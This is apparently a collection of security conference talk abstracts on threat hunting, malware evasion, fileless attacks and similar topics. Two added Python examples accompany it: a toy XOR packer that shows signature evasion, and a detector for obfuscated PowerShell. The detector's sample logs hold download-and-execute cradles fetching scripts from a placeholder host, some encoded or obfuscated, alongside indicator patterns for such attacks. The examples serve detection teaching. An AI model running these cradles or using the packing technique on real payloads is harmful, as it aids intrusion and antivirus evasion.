In today's threat landscape, modern security teams recognise that compromise is inevitable. However, that does not mean that a breach should be inevitable too.
Today's security leaders must bring together the people, process and technology to enable threat hunting. Detect and alert strategies need to be revamped to shift from reactive forms of incident response to proactive threat hunting.
Join Rick McElroy, Security Strategist for Carbon Black, to learn how better to enable your hunt.
Key takeaways:
1. Understand the role of threat hunting in a resilient cybersecurity strategy
2. Learn how to create a culture of threat hunting and embed it within your security strategy
3. Discover how to mature your threat hunting program
4. Learn how to create an ROI for threat hunting
5. Gain practical insight into the steps to take in order to start threat hunting
Through the first three quarters of this year, up to 47% of malware detected by WatchGuard evaded signature-based protections. To explain how this could happen, we will walk through popular signature-evasion techniques, including code packing and polymorphism, and discuss how they help malware authors hide from traditional antivirus. Furthermore, we will show actual examples of these techniques in action with various malware samples. This talk will highlight the need for multi-layer security including behavioral-based malware detection.
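The following Python toy, added here as an illustration and not code from the talk or from WatchGuard, shows the mechanism behind that statistic: a byte signature that matches a plain sample fails against packed and polymorphic variants of the same payload, and only a layer that unpacks (or watches what the sample does at runtime) recovers the detection. The payload bytes, the packer header, the signature name and the beacon URL are all constructed for the demo.

```python
"""Why byte-signature AV misses packed and polymorphic samples (added example)."""
from __future__ import annotations

import hashlib
import os
import re

# Constructed stand-in for a malicious payload: the bytes are benign text, but the
# API names below are the kind of thing a signature writer keys on.
PAYLOAD = (
    b"MZ\x90\x00" + b"\x00" * 12
    + b"LoadLibraryA kernel32.dll CreateRemoteThread WriteProcessMemory "
    + b"http://example.invalid/beacon "  # hypothetical C2 URL, not a real one
    + b"\x00" * 8
)

# A signature written against the plain sample: a fixed byte sequence plus a
# short regex, roughly what a classic AV definition looks like.
SIGNATURES = {
    "Trojan.Injector.Gen": re.compile(rb"CreateRemoteThread.{0,32}WriteProcessMemory", re.S),
}

MAGIC = b"PK01"  # constructed packer stub header, not a real format


def scan(blob: bytes) -> list[str]:
    """Static scan: names of every signature that matches the raw bytes."""
    return [name for name, rx in SIGNATURES.items() if rx.search(blob)]


def pack(payload: bytes, key: bytes) -> bytes:
    """Toy packer: XOR the payload with a repeating key and prepend a stub header.
    Every distinct key yields a byte-different (polymorphic) sample of the same code."""
    if not key or len(key) > 255:
        raise ValueError("key must be 1..255 bytes")
    body = bytes(b ^ key[i % len(key)] for i, b in enumerate(payload))
    return MAGIC + bytes([len(key)]) + key + body


def unpack(blob: bytes) -> bytes:
    """What the stub does at runtime, and what an emulator or sandbox recovers."""
    if not blob.startswith(MAGIC):
        raise ValueError("not a packed sample")
    klen = blob[len(MAGIC)]
    key = blob[len(MAGIC) + 1 : len(MAGIC) + 1 + klen]
    body = blob[len(MAGIC) + 1 + klen :]
    return bytes(b ^ key[i % klen] for i, b in enumerate(body))


def sha256(blob: bytes) -> str:
    return hashlib.sha256(blob).hexdigest()


def scan_with_unpacking(blob: bytes) -> list[str]:
    """Layered check: scan the bytes on disk and, if the packer stub is recognised,
    also scan what it would unpack into memory."""
    hits = scan(blob)
    if blob.startswith(MAGIC):
        hits += [h for h in scan(unpack(blob)) if h not in hits]
    return hits


if __name__ == "__main__":
    print("plain sample:", scan(PAYLOAD))
    for _ in range(3):  # three polymorphic variants: different hashes, same behaviour
        variant = pack(PAYLOAD, os.urandom(8))
        print(sha256(variant)[:16], "static:", scan(variant),
              "after unpack:", scan_with_unpacking(variant))
```

Each run prints three variants with different hashes that the static scan misses and the unpacking scan catches; a real packer also adds anti-emulation tricks, which is why behavioural monitoring of the running process is the layer that survives.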
In the era of DevSecOps, CI/CD and Agile development many companies still become victims of disastrous data breaches caused by insecure applications. The presentation explains an application security strategy to reduce costs and assure holistic Application Security Testing (AST) of corporate web and mobile applications. The talk will also encompass application inventory and discovery, vulnerability correlation, virtual patching and practical usage of Machine Learning in application security.
The security industry has recognized for some time that manual processes are no longer capable of achieving the velocity required to effectively and rapidly respond to cyber threats. Security teams want to automate incident response operations, but remain unable to do so for three primary reasons:
1. They can assess the impact of a threat, but not its impact on production
2. They can automate the actions, but not the decisions
3. Their IT Operations counterparts do not trust automation
In this session, Mr. Rochford will address each of these concerns, as well as if and how they can be safely overcome.
Most people don't have movies and TV shows made about their jobs. X-Force Red does. X-Force Red is IBM's new elite team of penetration testers, the people most of the public calls hackers. It's a common misunderstanding that "hacker" means a computer criminal. Our team attacks networks and applications across cloud, mobile, IoT and just about anything else before the bad guys do. In many ways, penetration testing is harder than what criminals do: a criminal only needs to find one way in, while X-Force Red testers aim to find every flaw in their target and then help the client fix them. Come to this session to hear some real-world stories of legal hacking… some funny, some scary.
Nominet brings its industry-leading machine learning and analytics capabilities to cyber risk management to bolster a company's security posture and mitigate risks associated with cyber threats. Powered by its DNS-based Active Defence platform, Nominet analyses the organisation's DNS traffic through data correlation against integrated threat intelligence feeds to produce rich, actionable insights that remove threats via policy development. Nominet's cyber experts work with customers to develop advanced risk mitigation strategies benchmarked against sector best practices and tailored to their specific network capabilities and configurations. With a light-touch, flexible data ingestion model, Nominet delivers value to customers quickly and effectively with a holistic network security rating, incorporating internal and external cyber activity with pinpoint accuracy. The cyber risk management framework extends to third party risk assessments and supplier scoring for comprehensive supply chain cyber awareness.
Bug bounties are becoming better understood and more deeply embedded in the information security industry. The number of enterprise organisations, researchers and bounty pay-outs is on the rise, and there is also a notable increase in the criticality of submissions. Adoption is increasing remarkably fast and is expected to continue doing so for the foreseeable future. The area of responsible reporting is far from resolved, yet despite the challenges that remain, bug bounty programmes are being launched at a remarkable pace, and each faces many of the same challenges. There is evidence of both good and bad practice in the bug bounty marketplace. This session looks at how to better understand bug bounty programmes, considers how such programmes sit within wider technical assurance frameworks, provides advice to the buyers of such services, protects the interests of those participating in programmes and, where appropriate, suggests how to improve the bug bounty landscape.
As the need for qualified security professionals rises, the industry needs to tackle the skills shortage head-on and encourage the very best people to choose cybersecurity as a career. While cybersecurity is an extremely challenging, exciting and rewarding career, it is essential to also ensure the industry promotes best practice and ethics while developing a clear professional career path.
Recently, innovations in crowdsourced security show that motivated and prepared hackers outperform advanced scanning, bug bounty, and ordinary pen testing approaches. When armed with a software platform built for ethical hacking, security testing dramatically improves. It holds true whether the testing is for general vulnerability discovery, compliance, or implementing DevSecOps in a secure software development lifecycle.
Crowdsourced Penetration Testing lets organizations see and control the testing process and finds severe vulnerabilities before attackers do.
Find out the results leading organizations in Europe and elsewhere get when adopting a software and crowdsourced approach to security.
With an exponential rise in data breaches, it is clear that traditional methods such as DLP, network security and endpoint security are still failing. Other business pressures such as regulation, the drive for innovation and extensive collaboration call for a new approach to address these risks. Covata views Data as the New Endpoint and, through its Data Security Platform, enables organisations to Discover, Protect and Control every piece of unstructured data regardless of where it resides. Come and discover this new perspective and gain insight into the best defence for your organisation whilst delivering information governance best practice.
The need to manage security threats in the cloud will only grow - IT execs expect 60 percent of workloads to run in the cloud by 2018. While many concerns about cloud security have abated, a huge stumbling block remains: cloud visibility. Lack of visibility into cloud activity has been the #1 cloud security problem plaguing cloud-focused IT organizations, according to the SANS institute.
Led by ProtectWise Co-Founder and CTO Gene Stevens, this session will help you understand how to gain pervasive visibility, automated threat detection and unlimited forensic exploration for enterprise activity wherever it occurs - in the cloud, of course, but also in hybrid environments, within the enterprise or on industrial control systems.
With an increasing pace of change and adoption of new technologies such as the Internet of Things, new platforms on which we deploy including public cloud, and new ways and places of working, brought about by the transitional and evolving nature of businesses, security visibility becomes ever-more critical, yet more challenging.
Gaining a clear understanding of IT infrastructure, hosts and critical applications, the vulnerabilities to which they may be susceptible, and the ability to demonstrate compliance against regulatory and organisational mandates is a task made more difficult by the transitional nature of business and underlying technologies. In this session we look at some of those challenges and the changing response needed to adapt and regain visibility, in order to respond in a timely manner to critical events such as WannaCry and to wide-ranging initiatives such as GDPR.
Computer security is an uphill battle. Fileless malware is another in a long line of techniques designed to circumvent the protection offered by AV vendors. In this session we examine a recently seen example of fileless malware and the impact it can have on a system.
As attacks become more sophisticated, it is no longer a question of if you are going to be breached but when. Security threat prevention is still effective in blocking the vast majority of threats, but the sheer volume of attacks and associated security events means it is often hard to investigate each event using conventional tools, so breaches go unnoticed and uninvestigated. Time is of the essence, and any solution that can reduce the time it takes to detect breaches and contain threats is extremely valuable. Part of the solution is advanced threat detection, where anomalies in network behaviour are detected and linked to security event information to raise the priority of an event. In addition, security threat prevention solutions can be enhanced to provide all the details required to investigate an event faster, so that more events can be examined in the same time. Circumstantial evidence based on flow records and event logs is no longer enough: detailed packet data available on demand, so that all the details can be seen and examined quickly, is the only way to get to the hard facts and determine quickly whether there is an issue or not.
The future of software development is the "full spectrum engineer". The speed demands of modern development require not just the ability to move up and down the stack, but across the spectrum of processes from design, coding, functional and non-functional testing and deployment. Maximizing velocity requires the work of one engineer to be available to the customer without coordination with others. This means the "full spectrum engineer" must have the capability of also securing their own work. The future software engineer will know about software security and will have automated tools at their disposal. We will still have specialists to go deep but software security will no longer be thought of as a specialist discipline.
Someone breaking into your network is inevitable. Threat intelligence is the lifeblood of investigating a potential break-in. While threat intelligence sharing is common practice via ISACs or informal networks, most of it lacks context and relevance for the receiving organization. But when a trusted set of peers can share threat intelligence anonymously and it is combined with automation and orchestration, they can dramatically improve their ability to thwart attacks quickly, even proactively. This talk outlines how to share threat intelligence anonymously and leverage an enterprise security response engine to reduce the time to identify and respond to a breach from weeks down to minutes.
SecureLink's Research Chief shares interconnected war stories on the underground, ransomware and geopolitical threats. He'll extrapolate their impact and risk to your organization, and indulge in a small peek into the future.
Today's cyberthreats are cunning and persistent, taking advantage of unmonitored assets and your brand's digital presence to wreak havoc outside the protection of your firewall. RiskIQ gives you the perspective of an attacker, discovering where you're exposed and what needs to be protected, as well as detecting digital threats against you and your brand, like phishing, brand abuse, social media imposters, and rogue or compromised mobile apps. If you're addressing these types of threats in a manual or one-off way, you're working too hard. Work smarter by unifying and automating the detection-to-mitigation processes to protect your business, brand, and customers. We'll show you how.
Distributed Denial of Service (DDoS) attacks are one of the biggest headaches for website owners and Internet infrastructure operators alike. The coming IoT CyberWar against the Internet and the Domain Name System (DNS) is going to be launched from millions of webcams, lightbulbs, toilet seats and smart thermostats, all networked inside your home and running on high-bandwidth connections. We show how the IoT CyberWar is poised to overcome known defense mechanisms and wreak a path of havoc and destruction never before seen. IoT-based DDoS could be the Armageddon we have all been hoping to avoid.
Organizations are investing in cybersecurity on an unprecedented scale and spending is reaching unsustainable levels as boards tire of endless requests to increase the budget. Yet the number of security breaches and overall cost of cybercrime is on the rise—a massive US$21.2 million in the last year on average for the US. Organizations need to recognize that spending alone does not always equate to value. Many organizations are spending too much on the wrong technologies. Making wise security investments in breakthrough security technologies like advanced analytics and artificial intelligence can help to make a difference and better protect organizations in today's threat landscape.
To detect unknown malware, organizations need a new approach that doesn't rely on malware signatures and learning from what past malware looks like and how it behaves. This Negative Security Model approach that detects "the bad" falls short because it can't keep up with a practically infinite number of new malware samples. A Positive Security Model that focuses on understanding a finite set of legitimate system behavior offers more foolproof detection. When behavior isn't following a normal path, the Positive Security Model assumes it's "bad" and prevents it from executing, no matter what attack vector or method is being used.
While IT and security technology continue to evolve, most security experts – and most attackers – agree that people are the weakest link in any information system. How do today's attackers fool users into giving up their credentials or downloading malicious code? What are the latest methods in this "social engineering," and what types of attacks are you likely to experience in your organization? And most importantly, what can your enterprise do to prevent these social engineering attacks? In this session, top experts will discuss the latest social engineering exploits, and offer some advice on how you can mitigate them.
The prevalence of ransomware is an artefact of the current state of cybersecurity. In this talk, learn the various recognised mechanisms that ransomware creators use to elicit compliance, payment and even sympathy from the people they infect. Using this knowledge, you will be able to better educate yourselves and your users about how to stay calm when under cyber attack, and how to gauge your next steps.
Malware is dead; it's still out there, but it is used for smash-and-grab, in-your-eye pokes or as a distraction at most. The real threat has moved to higher ground, and PowerShell is king there. PowerShell is the vector for over 80% of fileless malware executions in attacks. The majority of endpoint protection solutions on the market either bluntly block all PowerShell sessions or block nothing, because they lack granular insight into PowerShell sessions, so sophisticated attackers run malicious, obfuscated code inside PowerShell and infect the endpoint without being detected or blocked.
Cybereason has announced the unique ability to gain visibility and control over what PowerShell is running within a session. Cybereason analyses every command PowerShell attempts to execute and blocks the execution of malicious commands, even when they are obfuscated. The result: scoped PowerShell use and high malop detection rates with low false positives. This session will discuss PowerShell attacks and how Cybereason is uniquely able to shut down the motorway to attackers while still letting administrators use this most versatile of toolkits.
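The fileless and PowerShell sessions above both turn on the same practical problem: the malicious command is rarely visible in the raw command line. As an added example, not Cybereason's product logic or anything shown in either talk, the Python script below decodes -EncodedCommand arguments and strips the cheap obfuscations (backtick escapes, string concatenation, parenthesised literals) before matching indicators, then flags a line as obfuscated when normalisation exposes indicators the raw text hid. The log layout, host and user names and URLs are all made up; the base64 sample is generated inside the block.

```python
"""Spot encoded and obfuscated PowerShell in script-block style log lines (added example)."""
import base64
import re


def _encode(ps: str) -> str:
    """Same transform powershell.exe -EncodedCommand expects: UTF-16LE, then base64."""
    return base64.b64encode(ps.encode("utf-16le")).decode("ascii")


# Constructed log lines in a made-up "4104 ... script=" layout (not real telemetry):
# a benign admin command, a fileless download-and-run one-liner hidden behind
# -EncodedCommand, and the same cradle obfuscated with backticks and concatenation.
SAMPLE_LOGS = [
    "4104 host=ws01 user=alice script=Get-Service | Where-Object Status -eq 'Running'",
    "4104 host=ws02 user=bob script=powershell.exe -nop -w hidden -enc "
    + _encode("IEX (New-Object Net.WebClient).DownloadString('http://example.invalid/a.ps1')"),
    "4104 host=ws03 user=carol script=I`EX (('Ne'+'w-Ob'+'ject') ('Ne'+'t.Web'+'Client'))"
    ".('Down'+'loadString').Invoke('http://example.invalid/b')",
]

ENC_RE = re.compile(r"-e(?:c|nc|ncodedcommand)?\s+([A-Za-z0-9+/=]{16,})", re.I)
CONCAT_RE = re.compile(r"'([^']*)'\s*\+\s*'([^']*)'")   # 'a'+'b'
PAREN_RE = re.compile(r"\(\s*'([^']*)'\s*\)")           # ('a')

# Indicators are matched against the lower-cased, de-obfuscated script text.
INDICATORS = {
    "invoke-expression": re.compile(r"\biex\b|invoke-expression"),
    "download-cradle": re.compile(r"downloadstring|downloadfile|net\.webclient|invoke-webrequest|\biwr\b"),
    "encoded-command": ENC_RE,
    "hidden-window": re.compile(r"-w(?:indowstyle)?\s+hidden"),
    "no-profile": re.compile(r"-nop\b|-noprofile"),
    "base64-decode": re.compile(r"frombase64string"),
    "policy-bypass": re.compile(r"-e(?:xecutionpolicy|p)?\s+bypass"),
    "char-casting": re.compile(r"\[char\]"),
}


def decode_encoded_command(script: str) -> str:
    """Append the decoded text after every -EncodedCommand argument."""
    def _expand(m):
        try:
            return m.group(0) + " <decoded> " + base64.b64decode(m.group(1)).decode("utf-16le")
        except (ValueError, UnicodeDecodeError):   # not valid base64 / UTF-16: keep raw token
            return m.group(0)
    return ENC_RE.sub(_expand, script)


def normalize(script: str) -> str:
    """Undo the cheap obfuscations that defeat naive string matching."""
    s = decode_encoded_command(script)
    s = s.replace("`", "")                      # backtick escapes: I`EX -> IEX
    while True:                                 # 'Ne'+'w-Ob'+'ject' -> 'New-Object'
        collapsed = CONCAT_RE.sub(lambda m: f"'{m.group(1)}{m.group(2)}'", s)
        if collapsed == s:
            break
        s = collapsed
    s = PAREN_RE.sub(r"'\1'", s)                # ('New-Object') -> 'New-Object'
    return s.lower()


def analyze(log_line: str) -> dict:
    """Score one log line; 'obfuscated' means normalisation exposed indicators the raw text hid."""
    script = log_line.split("script=", 1)[1] if "script=" in log_line else log_line
    host = re.search(r"host=(\S+)", log_line)
    raw_hits = {n for n, rx in INDICATORS.items() if rx.search(script.lower())}
    hits = [n for n, rx in INDICATORS.items() if rx.search(normalize(script))]
    obfuscated = bool(set(hits) - raw_hits)
    return {
        "host": host.group(1) if host else None,
        "indicators": hits,
        "obfuscated": obfuscated,
        "suspicious": obfuscated or len(hits) >= 2,
    }


if __name__ == "__main__":
    for line in SAMPLE_LOGS:
        r = analyze(line)
        print(f"{r['host']}: suspicious={r['suspicious']} obfuscated={r['obfuscated']} {r['indicators']}")
```

The "obfuscated" flag is the useful signal for triage: an administrator's Get-Service pipeline scores nothing, while both cradles score on several indicators only after decoding, which is exactly the gap a product that sees the raw command line but not the executed script falls into. Enabling script block logging (Event ID 4104) on the endpoints is the prerequisite for having this text to analyse at all.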
In recent years, the scale of cyber-attacks has grown at an alarming rate. Security vendors are constantly on the lookout for new ways of providing effective protection. At Fortinet we have been using different forms of artificial intelligence for many years in order to classify threats, detect malicious activity, and create actionable intelligence to protect our customers.
This presentation will provide an overview of AI techniques and show how they are used, in conjunction with good old-fashioned human analysis, to fuel world class cyber security solutions.
There has been much speculation (not to mention exaggeration) over recent years about the fabled dark web. We've heard how this shady underworld is the refuge of the cybercriminal elite and even nation-state threat actors. That this is their "Wolf's Lair," where they gather to plot the breaching of businesses, the downfall of governments, and the hacking of celebrities.
As with much mainstream reporting of technology, and cyber threats in particular, there's a grain of truth here. This less accessible and more volatile corner of the internet as we know it does offer those with less honorable motives a secret marketplace for their wares.
The confusing terminology around what the dark web is or isn't shouldn't be a barrier to defenders realizing the potential benefits of information gathered from these anonymous communities, and how it can be used to produce valuable threat intelligence.
It's estimated that there may be as many as 1.5 million unfilled positions in the global cybersecurity industry over the next few years. How will security departments respond to these staffing shortages? Where can enterprises find new security talent? And how can today's cybersecurity professionals take advantage of the skills shortage to advance their own careers? In this session, top experts in security team management and hiring will discuss tactics you can use to make better use of your personnel resources – and how you can get the training and skills you need to increase your value to your organization, as well as others that might be hiring.
AI equips security teams with the automation necessary to keep pace with the speed and sophistication of today's cyber-attacks. But how do you transition to using AI in your enterprise? Hear real-world use cases of the Enterprise Immune System from organizations using AI to detect and autonomously fight back against threats.
An Adversary's Playbook is the organized collection of the Tactics, Techniques and Procedures (TTPs) employed during their attack lifecycle. As adversaries do not share their playbooks with defenders, we must derive them through observations of live attacks, shared information and intelligence analysis.
Pragmatic adversaries often re-use elements of attacks, so defenders can use the tracked data to identify attacks perpetrated by the same adversary and better prepare for future attacks.
Adversaries have a limited number of techniques they can employ when targeting a network; they share TTPs with others, and that means a single defense can defend against multiple adversaries.
Do you think email is immutable once delivered? The ROPEMAKER exploit shows this is not the case! We will introduce the exploit, disclose the latest research covering it, and show a live demonstration of the exploit in action. The presenters will also offer some mitigation techniques to help address this attack while also highlighting potential consequences of an attacker using it in the wild.
The earlier you detect and mitigate a threat, the less the ultimate cost to your business. By implementing an effective end-to-end threat management process that focuses on reducing detection and response times, you will have the ability to prevent high-impact security incidents, such as major data breaches. This process is known as Threat Lifecycle Management (TLM) and can help you improve the efficiency of your security operations.
- Determine if your spending is focused on the right areas.
- Understand how to prevent high-impact cyber incidents.
- Discover how you can lower your TCO and maximise the ROI of your security technology.
This briefing will describe the process and methods used to analyse applications for unknown vulnerabilities. Attendees will gain insight into the analysis techniques used for both open and closed source applications, including the tools and techniques for identifying potential inputs to an application and testing those inputs for vulnerabilities. It will include demonstrations of static analysis and of the tools, techniques and procedures used to identify and research vulnerabilities that often go undetected by vulnerability scanners.
No matter what your industry, you are likely wrestling to build security for Internet-connected devices that are not computers or smartphones. Whether you're controlling access to medical devices, oil rigs, retail systems, or manufacturing equipment, you're being challenged to extend the traditional network security perimeter to protect a whole new class of devices and systems. In this session, top experts will discuss trends in IoT attacks and threats and offer some best practices for securing IoT devices.
With increasingly sophisticated security threats, threat prevention solutions must perform advanced security functions under constantly rising and more complex user traffic. This session will delve into how preemptive intelligence from performance and security testing allows you to deploy the most robust and secure network infrastructure possible. The growing adoption of Transport Layer Security (TLS) will improve security and performance for network traffic, but it also brings its own challenges: cyber criminals hide in encrypted traffic, so organizations must decrypt traffic at network gateways in order to inspect it and decide how to handle it.
From measuring business risk to mitigating sophisticated attacks, IT security has become a complex combination of tasks and priorities. How are IT security pros setting those priorities in 2017? What are their biggest concerns, and where are they investing their time and money? In this session, you'll hear the results of new surveys conducted by Black Hat and Dark Reading that answer some of these questions. You'll get real data on how enterprises are investing their cybersecurity resources, how they are responding to new threats, and how they are managing the internal struggles that may affect their ability to protect critical business data.